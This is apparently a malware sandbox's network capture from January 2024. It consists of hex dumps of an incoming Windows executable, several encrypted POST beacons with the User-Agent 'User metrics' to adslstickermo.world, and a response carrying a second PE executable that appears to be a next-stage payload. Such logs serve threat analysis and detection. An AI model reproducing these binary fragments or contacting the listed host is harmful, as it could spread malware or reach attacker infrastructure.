mode.$.YOoYOoYOoM$nZOoYOnZOo:lXOoYOoXOo:oXOo:mXOoRichYOoPEL
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 00 eb 31 8b 45 10 05 02 01 00 00 89 45 cc 8b 45 e0 89 45 c8 8d 4d f0 e8 c6 b0 03 00 8b 4d c8 89 c2 8b 45 cc 89 14 24 89 4c 24 04 89 44 24 08 e8 3e fa 01 00 8b 45 e4 3b 45 08 75 08 8b 45 0c 89 45 c4 eb 06 8b 45 08 89 45 c4 8b 45 c4 89 45 dc 8b 45 e0 89 45 c0 8d 4d f0 e8 84 b0 03 00 89 c1 8b 45 c0 8b 55 dc 89 14 24 89 4c 24 04 89 44 24 08 e8 3c 99 02 00 a8 01 75 02 eb 05 e9 bf fe ff ff 8d 4d f0 e8 f9 b4 03 00 83 c4 50 5e 5d c3 0f 1f 00 55 89 e5 83 ec 3c 8b 45 0c 8b 45 08 89 4d f0 8b 45 f0 89 45 d4 8d 45 e0 31 c9 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 10 00 00 00 e8 7e e4 00 00 66 c7 45 e0 02 00 8d 0d a0 85 04 10 8d 45 f6 89 0c 24 89 44 24 04 e8 73 62 02 00 89 45 d0 c7 04 24 06 00 00 00 c7 44 24 04 e4 b7 87 75 e8 dc 5f 01 00 8b 4d d0 89 0c 24 ff d0 83 Data Ascii: 1EEEEMME$L$D$>E;EuEEEEEEEEMEU$L$D$<uMP^]U<EEMEEE1$D$D$~fEE$D$sbE$D$u_M$
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 04 5d 8d 3c 7c e8 6f 5b 01 00 8b 4d d0 89 0c 24 ff d0 83 ec 04 8b 45 f0 83 c4 3c 5e 5f 5b 5d c3 66 0f 1f 84 00 00 00 00 00 55 89 e5 83 ec 2c 8b 45 0c 8b 45 08 8b 45 0c 8b 4d 08 8d 55 f0 89 14 24 89 4c 24 04 89 44 24 08 e8 9b 20 00 00 a8 01 75 02 eb 5f 8d 4d e0 e8 cd 94 01 00 8d 4d e0 c7 04 24 01 00 00 00 e8 ee c0 02 00 83 ec 04 a8 01 75 02 eb 37 8d 45 f0 8d 4d e0 c7 04 24 28 4e 00 00 89 44 24 04 c7 44 24 08 10 00 00 00 e8 f7 ea 01 00 83 ec 0c a8 01 75 02 eb 08 8d 4d e0 e8 36 81 01 00 8d 4d e0 e8 ce d8 01 00 8d 4d e0 e8 a6 da 02 00 83 c4 2c 5d c3 90 55 89 e5 83 ec 10 8b 45 0c 8b 45 08 89 4d fc 8b 45 fc 89 45 f8 8b 4d 08 89 08 8b 4d 0c 89 48 04 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 54 b8 63 73 e8 8a 5a 01 00 ff d0 89 c1 8b 45 f8 89 48 08 83 c4 10 5d c2 08 Data Ascii: ]<\|o[M$E<^_[]fU,EEEMU$L$D$ u_MM$u7EM$(ND$D$uM6MM,]UEEMEEMMH1$D$TcsZEH]
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 55 89 e5 83 ec 10 8b 45 10 8b 45 0c 8b 45 08 83 7d 08 00 75 09 c7 45 fc 00 00 00 00 eb 30 83 7d 0c 00 74 06 83 7d 10 00 75 08 8b 45 08 89 45 fc eb 1c 8b 45 10 8b 4d 0c 8b 55 08 89 14 24 89 4c 24 04 89 44 24 08 e8 75 02 02 00 89 45 fc 8b 45 fc 83 c4 10 5d c3 66 2e 0f 1f 84 00 00 00 00 00 55 89 e5 83 ec 78 8b 45 08 c7 45 ec 00 00 00 00 8b 4d 08 31 c0 8d 45 ec 89 0c 24 c7 44 24 04 fc 2a 00 00 c7 44 24 08 00 00 00 00 89 44 24 0c e8 9c 80 00 00 a8 01 75 05 e9 5b 02 00 00 c7 05 cc ba 04 10 00 00 00 00 c7 45 e8 00 00 00 00 8b 45 e8 3b 45 ec 0f 83 3e 02 00 00 8b 45 e8 05 e8 03 00 00 8b 4d 08 31 d2 89 0c 24 89 44 24 04 c7 44 24 08 00 00 00 00 e8 05 dc 02 00 89 45 e4 83 7d e4 00 75 05 e9 01 02 00 00 8b 45 e4 83 78 0c 14 73 05 e9 f3 01 00 00 8b 45 e4 89 04 24 e8 ae Data Ascii: UEEE}uE0}t}uEEEMU$L$D$uEE]f.UxEEM1E$D$*D$D$u[EE;E>EM1$D$D$E}uExsE$
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: c7 41 18 00 00 00 00 c7 41 10 00 00 00 00 c7 41 08 0a 00 00 00 ff d0 89 94 24 94 00 00 00 89 84 24 90 00 00 00 8b 84 24 90 00 00 00 89 84 24 a8 00 00 00 8b 84 24 a8 00 00 00 8d 65 f4 5e 5f 5b 5d c3 0f 1f 44 00 00 55 89 e5 83 ec 10 8b 45 0c 8b 45 08 83 7d 08 00 75 10 8b 45 0c 89 04 24 e8 83 3d 03 00 89 45 fc eb 1f 8b 45 0c 8b 4d 08 31 d2 89 0c 24 89 44 24 04 c7 44 24 08 00 00 00 00 e8 f2 87 02 00 89 45 fc 8b 45 fc 83 c4 10 5d c3 0f 1f 80 00 00 00 00 55 89 e5 56 83 ec 50 8a 45 0c 8b 4d 08 24 01 88 45 fa c7 45 f4 00 00 00 00 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 c2 59 11 7d e8 01 50 01 00 ff d0 89 45 dc c7 04 24 09 00 00 00 c7 44 24 04 28 93 d7 73 e8 e8 4f 01 00 8b 55 dc 31 c9 8d 4d f4 89 14 24 c7 44 24 04 20 00 00 00 c7 44 24 08 00 00 00 00 89 4c 24 0c ff Data Ascii: AAA$$$$$e^_[]DUEE}uE$=EEM1$D$D$EE]UVPEM$EE1$D$Y}PE$D$(sOU1M$D$ D$L$
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 10 8d 84 24 14 07 00 00 89 04 24 e8 7e c3 03 00 83 ec 04 89 84 24 c4 06 00 00 8b 8c 24 c4 06 00 00 e8 58 9b 03 00 89 04 24 e8 f0 5e 02 00 66 8b 00 66 89 84 24 c2 06 00 00 0f b7 84 24 c2 06 00 00 89 44 24 1c c7 04 24 5c f9 f3 7a e8 7d 1a 02 00 89 c1 8b 44 24 1c 39 c8 0f 94 c0 24 01 88 84 24 c1 06 00 00 8a 94 24 c1 06 00 00 b8 01 00 00 00 b9 02 00 00 00 f6 c2 01 0f 45 c1 8d 8c 24 80 00 00 00 89 04 24 e8 f3 56 00 00 83 ec 04 8d 8c 24 80 00 00 00 e8 f4 c0 00 00 89 44 24 7c 83 7c 24 7c 00 0f 84 db 02 00 00 8b 44 24 7c 89 44 24 18 8d 0d 60 95 04 10 8d 84 24 6c 07 00 00 89 0c 24 89 44 24 04 e8 24 4d 02 00 89 c1 8b 44 24 18 8d 54 24 70 89 14 24 89 4c 24 04 89 44 24 08 e8 fa cd 03 00 8b 4d 08 8d 44 24 70 89 0c 24 89 44 24 04 e8 27 4a 01 00 8d 4c 24 70 e8 de b0 03 Data Ascii: $$~$$X$^ff$$D$$\z}D$9$$$E$$V$D$\|\|$\|D$\|D$`$l$D$$MD$T$p$L$D$MD$p$D$'JL$p
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: ec 01 00 00 00 eb 13 c6 45 ff 01 c7 04 24 39 7f f3 7a e8 5e 15 02 00 89 45 ec 8d 4d f0 e8 63 ac 03 00 8a 45 ff 24 01 0f b6 c0 83 c4 1c 5d c3 66 0f 1f 44 00 00 55 89 e5 53 57 56 83 e4 f8 81 ec 90 08 00 00 8b 4d 0c 8b 45 10 8b 55 1c 8b 55 18 8b 55 14 8b 55 08 89 4c 24 60 89 44 24 64 8b 0d 24 d4 04 10 a1 20 d4 04 10 09 c8 75 59 eb 00 89 e0 8d 4c 24 6d 89 48 04 c7 00 f0 84 04 10 e8 12 48 02 00 89 c6 e8 fb 81 03 00 89 c1 89 e0 89 70 08 89 50 04 89 08 e8 6a 7f 01 00 89 15 24 d4 04 10 a3 20 d4 04 10 8b 0d 24 d4 04 10 a1 20 d4 04 10 09 c8 75 0f eb 00 c7 44 24 68 00 00 00 00 e9 5b 01 00 00 eb 00 f2 0f 10 44 24 60 f2 0f 11 44 24 58 8b 45 14 89 44 24 50 c7 44 24 54 00 00 00 00 c7 44 24 4c 00 00 00 00 c7 44 24 48 00 00 00 00 c7 44 24 44 00 08 00 00 83 3d 18 d4 04 10 Data Ascii: E$9z^EMcE$]fDUSWVMEUUUUL$`D$d$ uYL$mHHpPj$ $ uD$h[D$`D$XED$PD$TD$LD$HD$D=
2024-01-03 17:24:54 UTC	1369	IN	Data Raw: 57 56 83 ec 20 8b 45 14 8b 45 10 8b 45 0c 8b 45 08 8d 05 49 57 04 10 89 45 f0 c7 45 ec 00 00 00 00 8b 45 f0 8b 55 14 8b 75 10 8b 7d 0c 8b 5d 08 8d 4d ec 89 1c 24 89 7c 24 04 89 74 24 08 89 54 24 0c 89 4c 24 10 ff d0 83 ec 14 89 c1 31 c0 83 f9 00 88 45 eb 7c 0c 8b 45 14 3b 45 ec 0f 94 c0 88 45 eb 8a 45 eb 24 01 0f b6 c0 83 c4 20 5e 5f 5b 5d c3 66 0f 1f 84 00 00 00 00 00 55 89 e5 83 ec 14 8b 45 10 8b 45 0c 8b 45 08 31 c0 83 7d 10 00 88 45 ff 74 34 8b 45 08 0f be 08 31 c0 83 f9 00 88 45 ff 74 24 8b 45 0c 0f be 08 31 c0 83 f9 00 88 45 ff 74 14 8b 45 08 0f be 00 8b 4d 0c 0f be 09 39 c8 0f 94 c0 88 45 ff 8a 45 ff a8 01 75 02 eb 38 8b 45 08 83 c0 01 89 45 08 8b 45 0c 83 c0 01 89 45 0c 8b 45 10 05 5b 06 07 53 83 c0 ff 89 45 f8 c7 04 24 63 79 f4 29 e8 1d 0f 02 00 Data Ascii: WV EEEEIWEEEUu}]M$\|$t$T$L$1E\|E;EEE$ ^_[]fUEEE1}Et4E1Et$E1EtEM9EEu8EEEEE[SE$cy)

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:24:58 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 341 Connection: Close Cache-Control: no-cache
2024-01-03 17:24:58 UTC	341	OUT	Data Raw: 35 8e 35 79 cb 29 11 b7 82 de 5d b9 9c b0 df a2 de f3 35 9f 6d 19 0a cb a3 52 c5 31 f4 6c db 14 52 08 ec 10 70 0c 49 88 75 d3 aa 23 eb dd 76 4c 5a 60 d2 47 56 fb 04 d8 ee d5 00 9d f8 31 24 d1 95 6b 68 9e 54 d9 9a 14 dd 2c 0f ba b1 98 42 70 92 a0 7a 9e 77 c2 9a fb 8d 83 29 e4 8a 45 78 ee 14 79 ea 53 df 0a ae 66 89 2a 1d 0f 0f 22 c3 e8 88 bd 36 f2 72 f0 6c 09 37 dd 2e 63 4b 14 61 c4 bc 07 d4 e7 43 70 a6 cf 16 fd 48 b0 d4 a9 8f 3d bc 0a 20 42 a2 f4 73 bb c7 e8 5d ce c3 de 44 32 26 5f 0a b5 39 12 96 76 29 8e a0 70 21 a3 10 a1 f3 5f 8a 82 a3 0d 2e c3 77 f6 2a 87 01 a1 69 79 31 bc 3d 39 0d aa d8 d9 67 6c 46 e2 ae 9c 34 75 27 91 1a f2 3c 33 22 9c 45 da eb 9f b7 5d 47 8e e2 49 92 1d 83 e1 63 22 85 11 aa f4 9c f2 90 39 28 44 b1 7c 55 61 61 ee 0e c2 a5 5d aa 93 61 Data Ascii: 55y)]5mR1lRpIu#vLZ`GV1$khT,Bpzw)ExySf"6rl7.cKaCpH= Bs]D2&_9v)p!_.wiy1=9glF4u'<3"E]GIc"9(D\|Uaa]a
2024-01-03 17:24:58 UTC	580	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:24:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=soNR3CotG85hdvjRk%2FzQa5o2emAZuNq3HWhDW%2BFZUd0zrQkMHSRDwBMJfsIBaGG9Zs2hjVYO6vPYTMGZtXBPT8ZlDlCEBazDrFp7dMORDEpIZml%2FitAxvF0%2BpR%2BDnyMB356zhTO8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf038cc346c57-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:24:58 UTC	70	IN	Data Raw: 34 30 0d 0a 14 d4 4f 0d 41 64 19 db 47 23 71 21 f8 e8 00 e4 93 bb c4 c5 b0 e6 61 a9 d5 fa 4f dc d7 ca 50 26 88 f5 99 2d 45 90 c5 90 b2 01 d5 92 10 41 30 3b 91 17 c2 ca eb 45 66 8b 2f ae 72 df 49 e9 21 31 0d 0a Data Ascii: 40OAdG#q!aOP&-EA0;Ef/rI!1
2024-01-03 17:24:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:24:59 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 341 Connection: Close Cache-Control: no-cache
2024-01-03 17:24:59 UTC	341	OUT	Data Raw: dc eb 39 1d e6 4b 5c 5d 77 58 42 3f f1 77 5e 4b a1 05 f7 76 63 15 34 60 fa 82 63 b9 04 d9 4b ac e3 e6 05 2d ee 54 76 1d bf 3c 91 78 09 d0 4e 05 8f 1b 61 89 2b 91 bd 37 df d1 22 65 6d f2 10 ea 0b d0 2f e6 4d 94 f2 7d 8a ea 14 63 be 2d 9c 64 29 74 03 68 bd 84 2f d9 bf 62 2d 65 00 f9 f4 e1 34 45 64 16 bf ff ab 73 d0 17 c2 bc 03 39 c0 61 21 1b 8e 62 b7 1f 88 5b 76 1b 8a a9 e0 1f 55 3a b0 2f 50 89 34 b9 a5 59 9d 91 64 75 00 35 fa 71 32 40 a2 83 55 ac 2b 7a 95 d8 3d da e1 97 9e ec 00 86 a0 f9 c4 ff d0 a5 dc 25 f5 64 2e 6c a1 c4 f0 ac 82 cf a3 9c 05 c2 d4 3c 0f d9 63 b4 b8 48 22 95 79 2e 61 84 eb f4 00 c3 b2 c6 bc 0a f5 53 08 23 b7 dd b2 2e 62 2f 2a 84 00 cb e3 12 a2 be 1d 70 25 73 cb d1 cb 1a c2 6f 2a ae 00 a6 c7 2a 32 57 e1 18 c5 bd 78 5e 4c 63 e3 15 bc 2f be Data Ascii: 9K\]wXB?w^Kvc4`cK-Tv<xNa+7"em/M}c-d)th/b-e4Eds9a!b[vU:/P4Ydu5q2@U+z=%d.l<cH"y.aS#.b/p%so*2Wx^Lc/
2024-01-03 17:25:00 UTC	580	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:25:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3keCCx0xADXn2Am63xWH25Gfdgg4FMudZAgrpszPzbprT%2BEtBBrbkBdEgqyE3zmUqnXpZqdQDRS%2F6MydjaIRhCpHc%2FeD3QTu57IxLBW%2BtPvoxESp4kpe7xwS8drujoph9NiaLC6%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf0420dd645fc-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:25:00 UTC	70	IN	Data Raw: 34 30 0d 0a 46 9a c7 c3 55 a5 ea b3 0c 99 80 10 3e 0c 5d 52 16 af 21 c2 81 78 ff ae 41 0c e9 0e 33 45 4c 3e 69 f9 1f 52 84 d1 48 ff 34 84 21 a3 a6 06 b0 2e e2 94 ba f7 9b a4 3d fa fc 14 27 f1 5b 8c 80 70 0d 0a Data Ascii: 40FU>]R!xA3EL>iRH4!.='[p
2024-01-03 17:25:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:25:01 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 310 Connection: Close Cache-Control: no-cache
2024-01-03 17:25:01 UTC	310	OUT	Data Raw: ea 6c d0 f5 8d e0 1f 29 ce 4d b8 67 52 b2 1d 51 a1 d0 ce a9 58 fc b2 95 96 53 44 08 18 b2 a1 73 63 be 6d 49 00 e3 92 3a 98 21 64 a8 37 25 58 24 a1 31 1e ed 54 0b 19 f4 0f 4b 0e bf fe b5 bd e9 40 f5 02 5e 85 a6 3a 39 d5 a5 30 4a 41 f2 fc bf fe b9 89 f6 68 91 5b cb 40 e1 0b 87 b3 6e 8f 93 92 c7 21 62 66 ad d3 d4 cc 6c 51 a6 dd f2 f3 2c 0e eb 60 7c 29 28 a6 29 f9 85 08 14 48 27 12 c7 0e a9 09 2e 3f d3 78 df 5a dc 3e 61 0a 86 8d 88 b4 a6 d4 80 fa 74 87 5a 39 0d 93 6e 8b 02 7c 77 d4 ea 8d ee eb 51 72 4f f2 a3 4d 23 b7 cd b2 f1 f8 ea 26 9f 3a 56 2a 3a 28 27 a8 37 a0 f2 30 ca 88 a5 c1 6d 8e 7d 9d c4 c3 ef 8e 59 e1 b7 77 0a a9 04 07 63 d7 8d e5 ad 00 9c 23 da 6c ef 58 a4 52 2d 56 04 78 a6 d1 c7 77 bc af 4f a1 cd dd c2 7f 2e c3 da 07 13 d3 ea 59 54 f2 4f 0e 4c d3 Data Ascii: l)MgRQXSDscmI:!d7%X$1TK@^:90JAh[@n!bflQ,`\|)()H'.?xZ>atZ9n\|wQrOM#&:V*:('70m}Ywc#lXR-VxwO.YTOL
2024-01-03 17:25:02 UTC	584	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:25:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgfjWTtgdbOQq9DlBKL0fOike6dCjxTwiuoUotkD0Eq8z8W46PHumE5kGGqon62d6Kg%2FG534ulMpbYMjzahXeFg2DQs%2FwrvLfN4o%2FSXj%2Fl%2FgLEek02SKUxvgcNoaLgE%2F2bqnR%2Flf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf050ac524746-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:25:02 UTC	785	IN	Data Raw: 37 30 64 30 0d 0a 06 00 00 00 00 00 00 02 00 00 00 00 a5 05 1f 65 88 14 c5 08 00 d4 04 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 67 b1 9c 55 06 df cf 55 06 df cf 55 06 df cf 91 73 db ce 50 06 df cf 5c 7e 4c cf 57 06 df cf 41 6d de ce 50 06 df cf 55 06 de cf 52 06 df cf 55 06 df cf 54 06 df cf 91 73 df ce 54 06 df cf 91 73 dd ce 54 06 df cf 52 69 63 68 55 06 df cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 Data Ascii: 70d0eMZ@!L!This program cannot be run in DOS mode.$gUUUsP\~LWAmPURUTsTsTRichUP
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: 48 8b 45 f8 48 83 c4 40 5d c3 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 20 48 8d 6c 24 20 4c 89 45 f8 48 89 55 f0 48 89 4d e8 c7 45 e4 00 00 00 00 48 63 45 e4 48 3b 45 f8 73 38 48 8b 45 f0 48 63 4d e4 8a 14 08 48 8b 45 e8 48 63 4d e4 88 14 08 8b 05 ed ec 04 00 3b 45 e4 75 0a c7 05 de ec 04 00 00 00 00 00 eb 00 8b 45 e4 83 c0 01 89 45 e4 eb be 48 83 c4 20 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 40 48 8d 6c 24 40 48 89 4d f0 48 8b 45 f0 48 89 45 e8 48 8b 48 08 e8 b1 17 01 00 a8 01 75 02 eb 10 48 8b 4d e8 e8 82 2f 01 00 24 01 88 45 ff eb 0e 48 8b 4d e8 e8 22 de 02 00 24 01 88 45 ff 8a 45 ff 24 01 0f b6 c0 48 83 c4 40 5d c3 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 30 48 8d 6c 24 30 48 89 4d f0 31 c0 89 c1 e8 59 38 01 00 a8 01 75 06 Data Ascii: HEH@]f.UH Hl$ LEHUHMEHcEH;Es8HEHcMHEHcM;EuEEH ]ff.UH@Hl$@HMHEHEHHuHM/$EHM"$EE$H@]ffffff.UH0Hl$0HM1Y8u
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: e7 04 00 8b 4d d4 48 6b c9 38 48 01 c8 8a 40 20 c0 e8 01 24 01 0f b6 c0 3b 45 fc 74 2b 8b 55 d4 48 8d 4d d8 41 b8 01 00 00 00 e8 5c 3d 02 00 8b 55 fc 8b 4d d4 e8 61 6e 00 00 89 45 ec 48 8d 4d d8 e8 b5 92 00 00 eb 16 8b 55 fc b8 06 00 00 00 b9 05 00 00 00 83 fa 00 0f 45 c1 89 45 ec eb 07 c7 45 ec 04 00 00 00 eb 00 eb 07 c7 45 ec 02 00 00 00 e8 f4 6a 01 00 8b 45 ec 48 83 c4 50 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 81 ec b0 02 00 00 48 8d ac 24 80 00 00 00 48 89 95 20 02 00 00 89 8d 1c 02 00 00 31 c9 ba 2c b3 c5 57 e8 67 bb 00 00 b9 02 00 00 00 31 d2 ff d0 48 89 85 10 02 00 00 48 c7 c0 ff ff ff ff 48 39 85 10 02 00 00 75 0c c6 85 2f 02 00 00 00 e9 c9 00 00 00 c6 85 0f 02 00 00 00 c7 45 d0 38 02 00 00 48 8b 85 10 02 00 00 48 89 45 b0 31 c9 ba f1 fb 91 Data Ascii: MHk8H@ $;Et+UHMA\=UManEHMUEEEEjEHP]ff.UHH$H 1,Wg1HHH9u/E8HHE1
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: 83 f8 00 74 0a 48 8b 45 e0 48 89 45 f8 eb 08 48 c7 45 f8 ff ff ff ff 48 8b 45 f8 48 83 c4 60 5d c3 90 55 48 83 ec 60 48 8d 6c 24 60 44 89 45 fc 48 89 55 f0 48 89 4d e8 48 8b 45 f0 48 89 45 e0 8b 45 fc 89 45 d0 48 8b 45 e0 48 89 45 d8 48 8b 45 e8 48 89 45 c0 48 8b 45 d8 48 89 45 c8 31 c9 89 4d d4 ba c0 39 18 54 e8 55 b6 00 00 48 8b 4d c0 48 8b 55 c8 44 8b 4d d0 44 8b 45 d4 ff d0 89 c1 8b 45 d4 f7 d9 19 c0 24 01 0f b6 c0 48 83 c4 60 5d c3 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 40 48 8d 6c 24 40 4c 89 45 f8 48 89 55 f0 48 89 4d e8 48 8b 4d e8 48 89 4d e0 48 8b 45 f0 48 89 41 20 48 83 c1 28 48 8b 55 f8 41 b8 04 02 00 00 e8 87 f3 01 00 48 8b 55 e0 48 89 d1 48 81 c1 30 02 00 00 e8 14 ef 00 00 48 8b 45 e0 48 c7 80 90 04 00 00 00 00 00 00 48 89 Data Ascii: tHEHEHEHEH`]UH`Hl$`DEHUHMHEHEEEHEHEHEHEHEHE1M9TUHMHUDMDEE$H`]ffffff.UH@Hl$@LEHUHMHMHMHEHA H(HUAHUHH0HEHH
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: 48 83 c4 08 5d c3 0f 1f 00 55 48 83 ec 40 48 8d 6c 24 40 44 89 45 f4 89 55 f0 48 89 4d e8 48 c7 45 e0 00 00 00 00 48 8b 55 e0 48 8b 4d e8 e8 a6 02 00 00 48 89 45 e0 48 83 f8 00 74 2b 48 8b 45 e0 8b 00 3b 45 f0 75 1e 8b 45 f4 48 8b 4d e0 8b 49 04 81 e1 00 00 00 f0 39 c8 75 0a 48 8b 45 e0 48 89 45 f8 eb 0a eb be 48 c7 45 f8 00 00 00 00 48 8b 45 f8 48 83 c4 40 5d c3 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 81 ec 80 00 00 00 48 8d ac 24 80 00 00 00 44 89 45 f4 48 89 55 e8 48 89 4d e0 48 8b 4d e8 e8 9b 64 03 00 48 89 45 c8 48 8b 45 e0 48 89 45 c0 31 c9 ba eb 8f 09 5d e8 a3 b0 00 00 48 8b 4d c0 4c 8b 45 c8 31 d2 ff d0 48 89 45 d8 48 83 7d d8 00 74 59 8b 45 f4 89 45 bc 48 8b 45 d8 48 89 45 b0 31 c9 ba 2c e8 00 5d e8 72 b0 00 00 48 8b 4d b0 8b 55 bc ff Data Ascii: H]UH@Hl$@DEUHMHEHUHMHEHt+HE;EuEHMI9uHEHEHEHEH@]ffffff.UHH$DEHUHMHMdHEHEHE1]HMLE1HEH}tYEEHEHE1,]rHMU
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: 00 00 8b 45 28 89 45 4c 48 8b 45 60 83 b8 78 54 00 00 11 7d 60 48 8b 45 60 6b 80 78 54 00 00 03 89 45 c4 8b 45 70 0f af 45 74 48 8b 4d 60 8b 89 78 54 00 00 83 e9 01 48 63 d1 48 8d 0d 6f 61 04 00 0f af 04 91 b9 08 00 00 00 99 f7 f9 89 c1 8b 45 c4 01 c8 89 45 24 8b 45 24 3b 45 4c 7d 14 c7 45 54 00 00 00 00 c7 45 50 01 00 00 00 8b 45 24 89 45 4c eb 00 eb 00 83 7d 50 00 75 0e 48 8b 45 60 c7 80 78 54 00 00 00 00 00 00 8b 55 54 31 c0 b9 80 00 00 00 83 fa 00 0f 45 c1 48 8b 4d 60 0b 81 78 54 00 00 88 c2 48 8b 4d 78 e8 f0 d7 00 00 c7 45 44 00 00 00 00 8b 45 44 48 8b 4d 60 3b 81 78 54 00 00 7d 1f 48 8b 45 60 48 63 4d 44 8b 14 88 48 8b 4d 78 e8 e6 14 00 00 8b 45 44 83 c0 01 89 45 44 eb d2 83 7d 54 00 0f 84 4f 01 00 00 48 8b 45 68 48 89 45 18 48 8b 45 18 8b 4d 70 0f Data Ascii: E(ELHE`xT}`HE`kxTEEpEtHM`xTHcHoaEE$E$;EL}ETEPE$EL}PuHE`xTUT1EHM`xTHMxEDEDHM`;xT}HE`HcMDHMxEDED}TOHEhHEHEMp
